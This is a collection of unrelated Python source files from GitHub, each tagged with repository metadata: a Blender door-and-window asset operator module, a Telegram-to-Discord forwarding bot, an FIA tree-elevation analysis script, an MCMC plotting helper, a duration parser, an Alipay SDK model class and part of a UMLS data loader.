    bl_idname = "doors_windows.add_handle_to_scene"
    bl_label = "Add Handle to Scene"
    bl_description = "This will add the current handle to the scene"

    # Unused by execute(); kept for interface parity with the other operators.
    asset_type: bpy.props.StringProperty(name="Asset Type",description="Type of Asset to Create")

    def execute(self, context):
        """Load the currently selected door-handle .blend (per the scene
        props) and link its object into the active collection."""
        coll = context.view_layer.active_layer_collection.collection
        props = utils_doors_windows.get_scene_props(bpy.context.scene)
        root_path = paths_doors_windows.get_entry_door_handle_path()
        handle_path = os.path.join(root_path, props.entry_door_handle_category, props.entry_door_handle + ".blend")
        door_handle_obj = pc_utils.get_object(handle_path)
        coll.objects.link(door_handle_obj)
        return {'FINISHED'}
class doors_windows_OT_save_asset_to_library(bpy.types.Operator):
    bl_idname = "doors_windows.save_asset_to_library"
    bl_label = "Save Current Asset to Library"
    bl_description = "This will save the current file to the active library"
    bl_options = {'UNDO'}

    # One of ENTRY_DOOR_PANEL, ENTRY_DOOR_FRAME, ENTRY_DOOR_HANDLE,
    # WINDOW_FRAME, WINDOW_INSERT.
    asset_type: bpy.props.StringProperty(name="Asset Type",description="Type of Asset to Save")

    @classmethod
    def poll(cls, context):
        # Requires an active object (the asset, or part of it).
        if context.object:
            return True
        else:
            return False

    def invoke(self,context,event):
        # Show the confirmation dialog drawn by draw() below.
        wm = context.window_manager
        return wm.invoke_props_dialog(self, width=300)

    def create_thumbnail_script(self,asset_path,asset_name,view_rotation):
        """Write a temporary Python script that, run in a headless Blender
        with the thumbnail scene, links the saved asset and renders a PNG
        next to it. Returns the script path."""
        file = codecs.open(os.path.join(bpy.app.tempdir,"thumb_temp.py"),'w',encoding='utf-8')
        file.write("import bpy\n")
        file.write("import os\n")
        file.write("import sys\n")
        # file.write("import " + __package__ + "\n")
        file.write("path = r'" + os.path.join(asset_path,asset_name) + "'\n")
        file.write("bpy.ops.object.select_all(action='DESELECT')\n")
        file.write("with bpy.data.libraries.load(r'" + os.path.join(asset_path,asset_name + ".blend") + "') as (data_from, data_to):\n")
        file.write("    data_to.objects = data_from.objects\n")
        file.write("for obj in data_to.objects:\n")
        file.write("    bpy.context.view_layer.active_layer_collection.collection.objects.link(obj)\n")
        # file.write("    " + __package__ + ".home_builder_pointers.assign_materials_to_object(obj)\n")
        file.write("    obj.select_set(True)\n")
        # Reproduce the user's viewport orientation for the render camera.
        file.write("bpy.context.scene.camera.rotation_euler = " + str(view_rotation) + "\n")
        file.write("bpy.ops.view3d.camera_to_view_selected()\n")
        #RENDER
        file.write("render = bpy.context.scene.render\n")
        file.write("render.use_file_extension = True\n")
        file.write("render.filepath = path\n")
        file.write("bpy.ops.render.render(write_still=True)\n")
        file.close()
        return os.path.join(bpy.app.tempdir,'thumb_temp.py')

    def create_save_object_script(self,save_dir,asset):
        """Write a temp script that extracts a single object (by name) from
        the current .blend into save_dir/<name>.blend. Returns script path."""
        source_file = bpy.data.filepath
        file = codecs.open(os.path.join(bpy.app.tempdir,"save_temp.py"),'w',encoding='utf-8')
        file.write("import bpy\n")
        file.write("import os\n")
        # Start from an empty scene so only the asset ends up in the file.
        file.write("for mat in bpy.data.materials:\n")
        file.write("    bpy.data.materials.remove(mat,do_unlink=True)\n")
        file.write("for obj in bpy.data.objects:\n")
        file.write("    bpy.data.objects.remove(obj,do_unlink=True)\n")
        file.write("bpy.context.preferences.filepaths.save_version = 0\n")
        file.write("with bpy.data.libraries.load(r'" + source_file + "') as (data_from, data_to):\n")
        file.write("    data_to.objects = ['" + asset.name + "']\n")
        file.write("for obj in data_to.objects:\n")
        file.write("    bpy.context.view_layer.active_layer_collection.collection.objects.link(obj)\n")
        # file.write("    obj.select_set(True)\n")
        # file.write("    if obj.type == 'CURVE':\n")
        # file.write("        bpy.context.scene.camera.rotation_euler = (0,0,0)\n")
        # file.write("        obj.data.dimensions = '2D'\n")
        # file.write("    bpy.context.view_layer.objects.active = obj\n")
        file.write("bpy.ops.wm.save_as_mainfile(filepath=r'" + os.path.join(save_dir,asset.name) + ".blend')\n")
        file.close()
        return os.path.join(bpy.app.tempdir,'save_temp.py')

    def create_save_assembly_script(self,save_dir,asset):
        """Write a temp script that copies ALL objects from the current
        .blend (assumed to contain only the assembly) into
        save_dir/<name>.blend. Returns script path."""
        source_file = bpy.data.filepath
        file = codecs.open(os.path.join(bpy.app.tempdir,"save_temp.py"),'w',encoding='utf-8')
        file.write("import bpy\n")
        file.write("import os\n")
        file.write("for mat in bpy.data.materials:\n")
        file.write("    bpy.data.materials.remove(mat,do_unlink=True)\n")
        file.write("for obj in bpy.data.objects:\n")
        file.write("    bpy.data.objects.remove(obj,do_unlink=True)\n")
        file.write("bpy.context.preferences.filepaths.save_version = 0\n")
        file.write("with bpy.data.libraries.load(r'" + source_file + "') as (data_from, data_to):\n")
        file.write("    data_to.objects = data_from.objects\n")
        file.write("for obj in data_to.objects:\n")
        file.write("    bpy.context.view_layer.active_layer_collection.collection.objects.link(obj)\n")
        file.write("bpy.ops.wm.save_as_mainfile(filepath=r'" + os.path.join(save_dir,asset.name) + ".blend')\n")
        file.close()
        return os.path.join(bpy.app.tempdir,'save_temp.py')

    def get_library_path(self,context):
        """Resolve the asset-type + active-category to a library directory.

        NOTE(review): falls through (returns None) for unrecognised
        asset_type values, which would crash os.path.join in draw()/execute().
        """
        props = utils_doors_windows.get_scene_props(context.scene)
        if self.asset_type == 'ENTRY_DOOR_PANEL':
            return os.path.join(paths_doors_windows.get_entry_door_panel_path(),props.entry_door_panel_category)
        if self.asset_type == 'ENTRY_DOOR_FRAME':
            return os.path.join(paths_doors_windows.get_entry_door_frame_path(),props.entry_door_frame_category)
        if self.asset_type == 'ENTRY_DOOR_HANDLE':
            return os.path.join(paths_doors_windows.get_entry_door_handle_path(),props.entry_door_handle_category)
        if self.asset_type == 'WINDOW_FRAME':
            return os.path.join(paths_doors_windows.get_window_frame_path(),props.window_frame_category)
        if self.asset_type == 'WINDOW_INSERT':
            return os.path.join(paths_doors_windows.get_window_insert_path(),props.window_insert_category)

    def get_thumbnail_path(self):
        # Template scene used as the base for thumbnail renders.
        return os.path.join(os.path.dirname(__file__),"thumbnail.blend")

    def execute(self, context):
        """Save the selected asset into the library and render a thumbnail,
        both via background Blender subprocesses."""
        current_rotation = get_current_view_rotation(context)
        rotation = (current_rotation.to_euler().x,current_rotation.to_euler().y,current_rotation.to_euler().z)
        # Background scripts read from bpy.data.filepath, so the session
        # must exist on disk first.
        if bpy.data.filepath == "":
            bpy.ops.wm.save_as_mainfile(filepath=os.path.join(bpy.app.tempdir,"temp_blend.blend"))
        path = self.get_library_path(context)
        if self.asset_type in {'ENTRY_DOOR_PANEL','ENTRY_DOOR_FRAME','WINDOW_FRAME','WINDOW_INSERT'}:
            save_script_path = self.create_save_assembly_script(path, self.get_asset(context))
            command = [bpy.app.binary_path,"-b","--python",save_script_path]
            subprocess.call(command)
            tn_script_path = self.create_thumbnail_script(path,self.get_asset(context).name,rotation)
            command = [bpy.app.binary_path,self.get_thumbnail_path(),"-b","--python",tn_script_path]
            subprocess.call(command)
        if self.asset_type == 'ENTRY_DOOR_HANDLE':
            save_script_path = self.create_save_object_script(path, self.get_asset(context))
            command = [bpy.app.binary_path,"-b","--python",save_script_path]
            subprocess.call(command)
            tn_script_path = self.create_thumbnail_script(path,self.get_asset(context).name,rotation)
            command = [bpy.app.binary_path,self.get_thumbnail_path(),"-b","--python",tn_script_path]
            subprocess.call(command)
        return {'FINISHED'}

    def get_asset(self,context):
        """Return the object to save: the assembly base point for assembly
        types, or the active object itself for handles."""
        if self.asset_type in {'ENTRY_DOOR_PANEL','ENTRY_DOOR_FRAME','WINDOW_FRAME','WINDOW_INSERT'}:
            return pc_utils.get_bp_by_tag(context.object,'IS_ASSEMBLY_BP')
        if self.asset_type == 'ENTRY_DOOR_HANDLE':
            return context.object

    def draw(self, context):
        # Confirmation dialog: show the target name and warn on overwrite.
        layout = self.layout
        path = self.get_library_path(context)
        files = os.listdir(path) if os.path.exists(path) else []
        asset_name = self.get_asset(context).name
        layout.label(text="Asset Name: " + asset_name)
        if asset_name + ".blend" in files or asset_name + ".png" in files:
            layout.label(text="File already exists",icon="ERROR")
# Operator classes registered with Blender via register_classes_factory below.
classes = (
    doors_windows_OT_create_new_door_window_asset,
    doors_windows_OT_save_asset_to_library,
    doors_windows_OT_add_handle_to_scene,
)
register, unregister = bpy.utils.register_classes_factory(classes) | CreativeDesigner3D/home_builder | assets/products/sample_doors_windows/ops_doors_windows.py | ops_doors_windows.py | py | 12,668 | python | en | code | 47 | github-code | 13 |
70706687698 | import yaml
import sys
import discord
import os
from dotenv import load_dotenv
# Loading configuration
load_dotenv()
with open('config.yml', 'rb') as f:
    config = yaml.safe_load(f)
# Discord initialization
intents = discord.Intents.default()
discord_client = discord.Client(intents=intents)
# Get our data from argument
# Expected argv[1] format (fields joined with '@'):
#   <telegram_channel_id>@<message_text>@<media_path>[@<extra_media_path>...]
# NOTE(review): '@' inside the message text itself would break this split —
# confirm the producer escapes it.
message = sys.argv[1]
data = message.split("@")
@discord_client.event
async def on_ready():
    """Runs once the client connects: routes the Telegram message (parsed
    into the module-level ``data``) to the matching Discord channel and
    forwards its text/media as embeds."""
    print('We have logged in as {0.user}'.format(discord_client))
    # Channel id's (Telegram source channel ids, as strings)
    channels_cybersport = ["-1001421655869"]
    channels_lviv = ["-1001254374439"]
    channels_ukraine = ["-1001483876482","-1001308491047"]
    channels_halyava = ["-1001374759118"]
    # Get channel to send message; anything unmatched goes to the trash channel.
    channel_trash = discord_client.get_channel(int(os.getenv("DISCORD_TRASH_CHANNEL")))
    if data[0] in channels_cybersport:
        channel_send = discord_client.get_channel(int(os.getenv("DISCORD_CYBERSPORT_CHANNEL")))
    elif data[0] in channels_lviv and "Львівич | Підписатися" in data[1]:
        # Strip the source channel's signature before reposting.
        data[1] = data[1].replace("Львівич | Підписатися","")
        channel_send = discord_client.get_channel(int(os.getenv("DISCORD_LVIV_CHANNEL")))
    elif data[0] in channels_ukraine and ("ЦЕНТР" in data[1] or "Інформує Україна" in data[1]):
        data[1] = data[1].replace("ЦЕНТР","").replace("Інформує Україна","")
        channel_send = discord_client.get_channel(int(os.getenv("DISCORD_UKRAINE_CHANNEL")))
    elif data[0] in channels_halyava and "Получить игру можно бесплатно" in data[1]:
        channel_send = discord_client.get_channel(int(os.getenv("DISCORD_HALYAVA_CHANNEL")))
    else:
        channel_send = channel_trash
    # Sending messages
    embed = discord.Embed(description=data[1])
    if data[2] != "":
        image = discord.File(data[2])
        if data[2].lower().endswith(".mp4"):
            # NOTE(review): attachment:// expects the bare filename, not a
            # full path, and set_image on an .mp4 likely won't preview —
            # confirm intended behaviour.
            embed.set_image(url="attachment://"+data[2])
            await channel_send.send(embed=embed, file=discord.File(data[2]))
        else:
            # Upload to the trash channel first to obtain a CDN URL that
            # can be embedded in the real message.
            uploaded_image = await channel_trash.send(file=image)
            image_url = uploaded_image.attachments[0].url
            embed.set_image(url=image_url)
            await channel_send.send(embed=embed)
    else:
        await channel_send.send(embed=embed)
    # Any additional media paths become their own embeds.
    if len(data)>3:
        for i in range (3,len(data)):
            embed = discord.Embed()
            embed.set_image(url="attachment://"+data[i])
            await channel_send.send(embed=embed, file=discord.File(data[i]))
# Exit Bot
# NOTE(review): this quit() is at module level, so it executes at import
# time — BEFORE discord_client.run() below ever starts. It was presumably
# meant to sit at the end of on_ready() to exit after the message is sent;
# confirm against the deployed version.
quit()
discord_client.run(os.getenv("TOKEN")) | Athexe/David-Bot | discord_messager.py | discord_messager.py | py | 2,524 | python | en | code | 0 | github-code | 13 |
27702446053 | """
Title: Open/parse FIA data
Author: Tony Chang
"""
import numpy as np
from matplotlib import pyplot as plt
from scipy.stats import norm
import matplotlib.mlab as mlab
def plot_fia(data):
    """Scatter the FIA plot locations (longitude on x, latitude on y)."""
    lon, lat = data['LON'], data['LAT']
    plt.scatter(lon, lat)
    return()
def data_AOA(AOA, plot):
    """Return the rows of ``plot`` that fall inside the bounding box.

    ``AOA`` is [xmin, ymin, xmax, ymax] with x = longitude and
    y = latitude; bounds are inclusive on both ends.
    """
    xmin, ymin, xmax, ymax = AOA
    in_lat = (plot['LAT'] >= ymin) & (plot['LAT'] <= ymax)
    in_lon = (plot['LON'] >= xmin) & (plot['LON'] <= xmax)
    return plot[in_lat & in_lon]
def remove_dup(data):
    """Return ``data`` restricted to one row per unique 'CN' value.

    np.unique yields the first-occurrence index of each CN, so the
    surviving rows come back sorted by CN.
    """
    _, first_idx = np.unique(data['CN'], return_index=True)
    return data[first_idx]
# Load the cleaned FIA observation table as a structured array
# (column names taken from the CSV header).
workspace = 'E:\\FIA\\'
name = 'fia_obs_clean4.10.2014.csv'
filename = '%s%s' %(workspace,name)
fia = np.genfromtxt(filename, delimiter = ',', names = True)
# Bounding box (lon/lat, decimal degrees) for the study area.
xmax = -108.263
xmin = -112.436
ymin = 42.252
ymax = 46.182
AOA = [xmin, ymin, xmax, ymax] #specify the bounds for the FIA data
# Sweep the sapling DBH cutoff from 1" to 10" and record how sapling
# count and prevalence (saplings / non-whitebark records) respond.
prevalence = []
n = []
r = np.arange(1,10,0.1)
for i in r:
    DBHlimit = i# 1.57 #decide on the limit that define "sub-adult" Note: change from 3" to 2" only looses 17 trees...
    ht_limit = 12
    # NOTE(review): elev_limt is defined but never used in the filters below.
    elev_limt = 4500 #5000, 5500, 6000, 6500, 7000 #whitebark pine limit seems to be at 7000
    wbp_code = 101
    limber_code = 113
    ffia = data_AOA(AOA, fia)
    wbp = ffia[(np.where(ffia['SPCD']==wbp_code)[0])]
    lbp = ffia[(np.where(ffia['SPCD']==limber_code)[0])]
    sap = wbp[(wbp['DIA'] < DBHlimit) & (wbp['HT'] <ht_limit)]
    # NOTE(review): the trailing "& (lbp['ELEV'] )" is a bare truthiness
    # mask (ELEV != 0) — it looks like an unfinished comparison against
    # elev_limt; confirm intent.
    lim_sap = lbp[(lbp['DIA'] < DBHlimit) & (lbp['HT'] <ht_limit) & (lbp['ELEV'] )]
    absent = ffia[(np.where(ffia['SPCD']!=wbp_code)[0])]
    # Collapse to one record per tree (unique CN) before counting.
    uni_sap = remove_dup(sap)
    uni_lim_sap = remove_dup(lim_sap)
    uni_abs = remove_dup(absent)
    n_sap = len(uni_sap)
    n.append(n_sap)
    n_lbp = len(uni_lim_sap)
    n_abs = len(uni_abs)
    prevalence.append( (n_sap + n_lbp) / n_abs)
#===================================================#
#==================PRE-ANALYSIS=====================#
#===================================================#
#check number of saplings
print(len(uni_sap), len(uni_lim_sap))
# Sapling count and prevalence as a function of the DBH cutoff swept above.
plt.plot(r, n)
plt.plot(r, prevalence)
#consider the distribution of each species by elevation
# species : code
# pinus contorta : 108
# pseudotsuga menziesii : 202
# subalpine fir : 19
# whitebark pine = 101
# limber pine = 113
pcont_code = 108
pmenz_code = 202
sfir_code = 19
# Per-species record sets within the AOA, de-duplicated by tree CN.
all_pcont = remove_dup(ffia[(np.where(ffia['SPCD']==pcont_code)[0])])
all_pmenz = remove_dup(ffia[(np.where(ffia['SPCD']==pmenz_code)[0])])
all_sfir = remove_dup(ffia[(np.where(ffia['SPCD']==sfir_code)[0])])
all_wbp = remove_dup(ffia[(np.where(ffia['SPCD']==wbp_code)[0])])
all_lbp = remove_dup(ffia[(np.where(ffia['SPCD']==limber_code)[0])])
#select the saplings
# 1.57" DBH and 12' height define "sapling" here.
DBHlimit = 1.57
ht_limit = 12
pcont = all_pcont[(all_pcont['DIA'] < DBHlimit) & (all_pcont['HT'] <ht_limit)]
pmenz = all_pmenz[(all_pmenz['DIA'] < DBHlimit) & (all_pmenz['HT'] <ht_limit)]
sfir = all_sfir[(all_sfir['DIA'] < DBHlimit) & (all_sfir['HT'] <ht_limit)]
wbp = all_wbp[(all_wbp['DIA'] < DBHlimit) & (all_wbp['HT'] <ht_limit)]
lbp = all_lbp[(all_lbp['DIA'] < DBHlimit) & (all_lbp['HT'] <ht_limit)] #& (lbp['ELEV'] )]
#distributions seem normal so solve for the parameters...
#mu and sigma
pcont_para = norm.fit(pcont['ELEV'])
pmenz_para = norm.fit(pmenz['ELEV'])
sfir_para = norm.fit(sfir['ELEV'])
wbp_para = norm.fit(wbp['ELEV'])
lbp_para = norm.fit(lbp['ELEV'])
#plot the different elevation histograms
plt.rcParams['figure.figsize'] = (18.0, 12.0)
b = 25
pmenz_dist = plt.hist(pmenz['ELEV'], bins = b, color = 'blue', alpha = 0.4, label = ' $\it pseudotsuga\,menziesii\,(n=%i,\mu =%.2f, \sigma=%.2f)$'%(len(pmenz),pmenz_para[0],pmenz_para[1]))
pcont_dist = plt.hist(pcont['ELEV'], bins = b, color = 'red', alpha = 0.4, label = '$\it pinus\,contorta\, (n=%i,\mu =%.2f, \sigma=%.2f)$'%(len(pcont),pcont_para[0],pcont_para[1]))
sfir_dist = plt.hist(sfir['ELEV'], bins = b, color = 'green', alpha = 0.4, label = ' $ \it abies\,lasiocarpa\, (n=%i,\mu =%.2f, \sigma=%.2f)$'%(len(sfir),sfir_para[0],sfir_para[1]))
wbp_dist = plt.hist(wbp['ELEV'], bins = b, color = 'yellow', alpha = 0.4, label = ' $ \it pinus\,albicaulis\, (n=%i,\mu =%.2f, \sigma=%.2f)$'%(len(wbp),wbp_para[0],wbp_para[1]))
lbp_dist = plt.hist(lbp['ELEV'], bins = b, color = 'black', alpha = 0.4, label = ' $ \it pinus\,flexilis\, (n=%i,\mu =%.2f, \sigma=%.2f)$'%(len(lbp),lbp_para[0],lbp_para[1]))
# Fitted normal densities evaluated at the histogram bin edges.
# FIX: these must come AFTER the plt.hist calls above (the original
# referenced *_dist before it existed -> NameError). Also uses
# scipy.stats.norm.pdf instead of matplotlib.mlab.normpdf, which was
# removed in matplotlib >= 3.1; norm is already imported above.
pcont_y = norm.pdf(pcont_dist[1], pcont_para[0], pcont_para[1])
pmenz_y = norm.pdf(pmenz_dist[1], pmenz_para[0], pmenz_para[1])
sfir_y = norm.pdf(sfir_dist[1], sfir_para[0], sfir_para[1])
wbp_y = norm.pdf(wbp_dist[1], wbp_para[0], wbp_para[1])
lbp_y = norm.pdf(lbp_dist[1], lbp_para[0], lbp_para[1])
plt.grid()
plt.legend(loc = 'upper left')
plt.ylabel('Frequency')
plt.xlabel('Elevation')
#plot the lines
# Scale each pdf by bin width * sample size so it overlays the count histogram.
pmenz_wt = (pmenz_dist[1][1]-pmenz_dist[1][0])*(len(pmenz))
pcont_wt = (pcont_dist[1][1]-pcont_dist[1][0])*(len(pcont))
sfir_wt = (sfir_dist[1][1]-sfir_dist[1][0])*(len(sfir))
wbp_wt = (wbp_dist[1][1]-wbp_dist[1][0])*(len(wbp))
lbp_wt = (lbp_dist[1][1]-lbp_dist[1][0])*(len(lbp))
plt.plot(pmenz_dist[1], pmenz_y * pmenz_wt, color = 'blue', lw = 2)
plt.plot(pcont_dist[1], pcont_y * pcont_wt, color = 'red', lw = 2)
plt.plot(sfir_dist[1], sfir_y * sfir_wt, color = 'green', lw = 2)
plt.plot(wbp_dist[1], wbp_y * wbp_wt, color = 'yellow', lw = 2)
plt.plot(lbp_dist[1], lbp_y * lbp_wt, color = 'black', lw = 2)
plt.savefig('hist_sap.png', transparent=True, bbox_inches='tight', pad_inches=0)
#output is for the GYE range of the species
#=============================================================#
'''
What can we consider using these data histograms?
We can first see that the apparent (if we believe the data is unbiased)
lower bound of whitebark pine is around 7000' in elevation.
For limber pine, this is well within the mean of the sample population; therefore
it seems unreasonable to assume that any sapling recorded as limber pine above 7000' should
simply be reclassified as whitebark. However, if all the field sub-adult measurements
below 7000' were classified as limber pine, it may be correct...
Perhaps we should just consider the saplings first?
''' | tonychangmsu/Python_Scripts | eco_models/wbp/FIA_piekielek_extractor.py | FIA_piekielek_extractor.py | py | 6,102 | python | en | code | 0 | github-code | 13 |
37175485494 | import sys, os
import six
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)),
'..', 'modules', 'MCcubed', 'MCcubed', 'plots', ''))
from mcplots import trace, pairwise, histogram
__all__ = ["mc3plots"]
def mc3plots(output, burnin, thinning, nchains, uniform, molfit,
             out_spec, parnames, stepsize, date_dir, fnames, fext='.png'):
  """
  Reformats the MC3 output file so that the log(abundance) factor is with
  respect to molar fraction, rather than the initial values (as MC3 does).
  Calls trace(), pairwise(), and histogram() using these values.

  Parameters
  ----------
  output  : string. Path to MC3 output.npy file.
  burnin  : int. Number of burn-in iterations.
  thinning: int. Thinning factor of the chains (use every thinning-th
                 iteration) used for plotting.
  uniform : array-like. If not None, set uniform abundances with the
                        specified values for each species.
  nchains : int. Number of parallel chains in MCMC.
  molfit  : list, strings. Molecules to be fit by the MCMC.
  out_spec: list, strings. Molecules included in atmospheric file.
  parnames: list, strings. Parameter names.
  stepsize: array, floats.  Initial stepsizes of MCMC parameters.
  date_dir: string. Path to directory where plots are to be saved.
  fnames  : list, strings. File names for the trace, pairwise, and histogram
            plots, in that order.
  fext    : string. File extension for the plots to be saved.
            Options: .png, .pdf
            Default: .png
  """
  # Load and stack results, excluding burn-in
  # allparams shape is assumed (nchains, nparams, niter) — TODO confirm.
  allparams = np.load(date_dir + output)
  allstack = allparams[0, :, burnin:]
  for c in np.arange(1, allparams.shape[0]):
      allstack = np.hstack((allstack, allparams[c, :, burnin:]))
  # Subtract initial abundances if uniform, so that plots are log(abundance)
  if uniform is not None:
      # Find the indices of fitted molecules within the atmosphere species
      # list; '_' suffix avoids substring collisions (e.g. CO vs CO2).
      molind = []
      for imol in range(len(molfit)):
          for j  in range(len(out_spec.split())):
              if molfit[imol]+'_' in out_spec.split()[j] and \
                 stepsize[-len(molfit):][imol] > 0:
                  molind.append(j)
      if molind != []:
          allstack[-len(molfit):, :] += \
                                 np.log10(uniform[molind]).reshape(len(molind),1)
  # Slice only params that are varied (remove static params)
  ipar = stepsize != 0
  if parnames is None:
      # Generate default names P0, P1, ... (dtype differs between py2/py3).
      nparams = stepsize.size
      namelen = int(2+np.log10(np.amax([nparams-1,1])))
      parnames = np.zeros(nparams, "|S%d"%namelen if six.PY2 else "<U%d"%namelen)
      for i in np.arange(nparams):
          parnames[i] = "P" + str(i).zfill(namelen-1)
  parnames = [parnames[i] for i in range(len(parnames)) if ipar[i]]
  # Trace plot:
  trace(    allstack, parname=parnames, thinning=thinning,
            savefile=date_dir + fnames[0] + fext,
            sep=np.size(allstack[0])/nchains)
  # Pairwise posteriors:
  pairwise( allstack, parname=parnames, thinning=thinning,
            savefile=date_dir + fnames[1] + fext)
  # Histograms:
  histogram(allstack, parname=parnames, thinning=thinning,
            savefile=date_dir + fnames[2] + fext)
| exosports/BART | code/mc3plots.py | mc3plots.py | py | 3,265 | python | en | code | 31 | github-code | 13 |
2296248693 | """Time-related utilities."""
import re
from typing import Optional
from dateutil.relativedelta import relativedelta
# Matches duration strings such as "1y 2m 3d 4h" — units must appear in
# descending order of magnitude and each is optional. Note case matters:
# lowercase 'm' is months while uppercase 'M' is minutes.
_DURATION_REGEX = re.compile(
    r"((?P<years>\d+?) ?(years|year|Y|y) ?)?"
    r"((?P<months>\d+?) ?(months|month|m) ?)?"
    r"((?P<weeks>\d+?) ?(weeks|week|W|w) ?)?"
    r"((?P<days>\d+?) ?(days|day|D|d) ?)?"
    r"((?P<hours>\d+?) ?(hours|hour|H|h) ?)?"
    r"((?P<minutes>\d+?) ?(minutes|minute|M) ?)?"
    r"((?P<seconds>\d+?) ?(seconds|second|S|s))?"
)
def parse_duration_string(duration: str) -> Optional[relativedelta]:
    """Parse ``duration`` into a relativedelta, or None on no match.

    Supported symbols per unit of time:
    - years:   `Y`, `y`, `year`, `years`
    - months:  `m`, `month`, `months`
    - weeks:   `w`, `W`, `week`, `weeks`
    - days:    `d`, `D`, `day`, `days`
    - hours:   `H`, `h`, `hour`, `hours`
    - minutes: `M`, `minute`, `minutes`
    - seconds: `S`, `s`, `second`, `seconds`

    Units must be provided in descending order of magnitude.
    """
    match = _DURATION_REGEX.fullmatch(duration)
    if match is None:
        return None
    # Unmatched groups default to 0 so relativedelta gets a full mapping.
    amounts = {unit: int(value) for unit, value in match.groupdict(default=0).items()}
    return relativedelta(**amounts)
| bsoyka/roboben | bot/utils/time.py | time.py | py | 1,364 | python | en | code | 2 | github-code | 13 |
17035581924 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.Position import Position
class AdGroup(object):
    """Alipay ad-group domain model: plain attributes plus dict
    (de)serialisation in the alipay wire format."""

    # Attribute names double as the keys of the alipay dict form.
    _FIELD_NAMES = (
        'ad_user_id', 'crowd_condition', 'group_id', 'group_name',
        'plan_id', 'position_condition', 'quantity',
    )

    def __init__(self):
        for name in self._FIELD_NAMES:
            setattr(self, '_' + name, None)

    @property
    def ad_user_id(self):
        return self._ad_user_id

    @ad_user_id.setter
    def ad_user_id(self, value):
        self._ad_user_id = value

    @property
    def crowd_condition(self):
        return self._crowd_condition

    @crowd_condition.setter
    def crowd_condition(self, value):
        self._crowd_condition = value

    @property
    def group_id(self):
        return self._group_id

    @group_id.setter
    def group_id(self, value):
        self._group_id = value

    @property
    def group_name(self):
        return self._group_name

    @group_name.setter
    def group_name(self, value):
        self._group_name = value

    @property
    def plan_id(self):
        return self._plan_id

    @plan_id.setter
    def plan_id(self, value):
        self._plan_id = value

    @property
    def position_condition(self):
        return self._position_condition

    @position_condition.setter
    def position_condition(self, value):
        # Non-list values are ignored, matching the generated SDK behaviour.
        if isinstance(value, list):
            self._position_condition = [
                i if isinstance(i, Position) else Position.from_alipay_dict(i)
                for i in value
            ]

    @property
    def quantity(self):
        return self._quantity

    @quantity.setter
    def quantity(self, value):
        self._quantity = value

    def to_alipay_dict(self):
        """Serialise every truthy field to a plain dict."""
        params = dict()
        for name in self._FIELD_NAMES:
            value = getattr(self, name)
            if not value:
                continue
            if name == 'position_condition' and isinstance(value, list):
                # Convert list elements in place, as the generated SDK does.
                for i, element in enumerate(value):
                    if hasattr(element, 'to_alipay_dict'):
                        value[i] = element.to_alipay_dict()
            if hasattr(value, 'to_alipay_dict'):
                params[name] = value.to_alipay_dict()
            else:
                params[name] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build an AdGroup from a dict, or return None for empty input."""
        if not d:
            return None
        o = AdGroup()
        for name in AdGroup._FIELD_NAMES:
            if name in d:
                # Assignment goes through the property setters, so e.g.
                # position_condition items are converted to Position.
                setattr(o, name, d[name])
        return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/AdGroup.py | AdGroup.py | py | 4,596 | python | en | code | 241 | github-code | 13 |
39778030716 | import os
import pandas as pd
import logging
from tqdm import tqdm
from typing import Union, Optional
from logging import getLogger
# Enable pandas .progress_apply() with tqdm progress bars.
tqdm.pandas()
logger = logging.getLogger(__file__)
# NOTE(review): this formatter is created but never attached to a handler,
# so it has no effect on logger output as written — confirm intent.
formatter = logging.Formatter(
    "%(asctime)s [%(levelname)s] %(message)s", "%Y-%m-%d %H:%M:%S"
)
# from config import umls_api_key
class UmlsMappings(object):
    def __init__(
        self,
        umls_dir="/Users/david/umls/",
        umls_api_key="",
        force_reprocess=False,
        debug=False,
    ):
        """Load (or build and cache) the UMLS concept table.

        Parameters
        ----------
        umls_dir        : directory containing the UMLS RRF files.
        umls_api_key    : UTS API key, required only when MRCONSO.RRF must
                          be downloaded.
        force_reprocess : ignore the cached feather file and rebuild.
        debug           : load only the first chunk of MRCONSO.RRF.
        """
        self.umls_dir = umls_dir
        self.debug = debug
        self.force_reprocess = force_reprocess
        # Download the raw data first if it's missing (raises without a key).
        if not os.path.isfile(umls_dir + "MRCONSO.RRF"):
            self._download_umls(umls_api_key)
        self._load_umls()
        # When loading from cache the semantic types are already merged;
        # otherwise attach types/definitions now.
        # NOTE(review): _load_type_abbrevs/_load_types/_merge_types are
        # defined outside this excerpt — behavior assumed from names.
        if self.using_cached:
            self._load_type_abbrevs()
        else:
            self._load_types()
            self._merge_types()
            self._add_definitions()
        # self.cui_to_aliases = self.get_aliases()
        # self.cui_to_types = self._process_types()
        # self.cui_to_groups = self._process_groups()
        self._cache_umls()
    def _download_umls(self, api_key):
        """Validate the UTS API key before downloading UMLS data.

        Currently only raises when the key is empty; the actual download
        is not implemented in this excerpt.
        """
        if api_key == "":
            raise ValueError(
                """Please add valid UTS API key to config.py! \
                (For instructions on how to obtain a UTS API key,\
                please see https://documentation.uts.nlm.nih.gov/automating-downloads.html"""
            )
        else:
            pass
    def _download_semtypes(self, api_key):
        """
        Download semantic type files from UMLS

        Not implemented yet; the URLs below are the intended sources.
        """
        # Semantic network files
        # https://lhncbc.nlm.nih.gov/semanticnetwork/download/sn_current.tgz
        # Semantic Group Files
        # https://lhncbc.nlm.nih.gov/semanticnetwork/download/SemGroups.txt
        pass
    def _add_definitions(self):
        '''
        Add definitions of entities where available

        Reads MRDEF.RRF (cui, aui, sab, def columns) and left-joins the
        'def' text onto self.umls keyed on (cui, aui, sab); rows without
        a definition get NaN.
        '''
        umls_definitions = pd.read_csv(
            os.path.join(self.umls_dir, "MRDEF.RRF"),
            sep="|",
            usecols=[0,1,4,5,],
            names=["cui", "aui", "sab", 'def',],
        )
        self.umls = self.umls.join(umls_definitions.set_index(['cui','aui','sab']), on=['cui','aui','sab'])
def _load_umls(self):
"""
Load UMLS MRCONSO.RRF
"""
self.using_cached = False
cache_path = os.path.join(self.umls_dir, ".cached_df.feather")
if os.path.isfile(cache_path) and not self.force_reprocess:
print(f"Loading cached UMLS data from {cache_path}")
self.umls = pd.read_feather(cache_path)
self.using_cached = True
return
print("Loading UMLS dataset. This may take a few minutes")
col_names = [
"cui",
"lang",
"term_status",
"lui",
